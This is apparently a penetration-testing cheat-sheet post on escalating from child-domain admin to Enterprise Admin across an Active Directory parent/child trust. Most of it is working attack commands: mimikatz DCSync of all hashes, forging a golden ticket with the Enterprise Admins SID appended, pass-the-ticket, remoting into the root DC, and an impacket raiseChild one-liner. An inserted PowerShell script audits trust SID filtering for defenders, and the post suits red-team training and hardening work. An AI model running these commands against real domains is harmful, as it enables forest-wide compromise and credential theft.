Child Domain Trusts - Escalate Domain Admin to Enterprise Admin (SID Hijacking)
Enumeration:
get-adtrust -filter *
Manual Exploitation (Local)
All of the steps below are run interactively in an RDP session on DC02.
1. Run mimikatz.exe from DC02
Gather the information:
privilege::debug
lsadump::trust
lsadump::dcsync /all /csv
Create a Golden Ticket:
kerberos::golden /user:Administrator /domain:<CHILD.DOMAIN.LOCAL> /sid:<CHILD_DOMAIN_SID> /krbtgt:<KRBTGT_HASH> /sids:<PARENT_DOMAIN_SID>-519
- Append -519 (the RID of Enterprise Admins) to the parent domain SID in /sids:, so the value becomes <PARENT_DOMAIN_SID>-519.
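The reason the extra SID above is honoured is that SID filtering is not applied across parent/child (intra-forest) trusts: the forest, not the domain, is the security boundary, so a child domain's krbtgt hash is effectively a forest-wide secret. The following audit script is an added defender-side example, not code from the original post. It extends the get-adtrust enumeration above into a report that flags intra-forest trusts and any external trust whose quarantine (SID filtering) flag is off. It assumes the RSAT ActiveDirectory module and a domain-joined session with read access to the trust objects; the property names are those returned by Get-ADTrust.

```powershell
# Added defender-side audit, not part of the original post. Requires the RSAT
# ActiveDirectory module; run from a domain-joined host with read access to the
# trustedDomain objects. Property names are those returned by Get-ADTrust.
Import-Module ActiveDirectory

function Get-TrustSidFilteringReport {
    Get-ADTrust -Filter * | ForEach-Object {
        # Parent/child and tree-root trusts are intra-forest. SID filtering is not
        # applied across them, so a ticket forged with a child krbtgt and an extra
        # <PARENT_DOMAIN_SID>-519 SID is accepted by the forest root. The forest,
        # not the domain, is the security boundary.
        $assessment = if ($_.IntraForest) {
            'Intra-forest trust: child DCs and the child krbtgt are Tier 0 for the whole forest'
        } elseif ($_.SIDFilteringQuarantined) {
            'Quarantine (SID filtering) enforced: SIDs outside the trusted domain are dropped'
        } else {
            'No quarantine flag: confirm SID history from this trust is intended (netdom trust /quarantine:yes)'
        }
        [pscustomobject]@{
            Trust                   = $_.Name
            Direction               = $_.Direction
            TrustType               = $_.TrustType
            IntraForest             = $_.IntraForest
            SIDFilteringQuarantined = $_.SIDFilteringQuarantined
            SIDFilteringForestAware = $_.SIDFilteringForestAware
            Assessment              = $assessment
        }
    }
}

Get-TrustSidFilteringReport | Format-Table -AutoSize -Wrap
```

The Assessment column only reasons about intra-forest trusts and the quarantine flag; for forest trusts also review SIDFilteringForestAware, which is printed for reference. Every trust reported as intra-forest means that every domain controller of that child domain must be protected to the same standard as the forest root, because no trust setting can close this path.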
Pass the Ticket.
kerberos::ptt ticket.kirbi
2. Enter PowerShell Session to DC01
Once the ticket is injected, a PowerShell remoting session from DC02 to DC01 can be opened:
Enter-PSSession DC01
Auto Exploitation (Remote)
impacket-raiseChild -target-exec <DOMAIN.LOCAL> -hashes :<DC02_ADMINISTRATOR_HASHES> '<CHILD.DOMAIN.LOCAL>/Administrator' -k
This post is licensed under CC BY 4.0 by the author.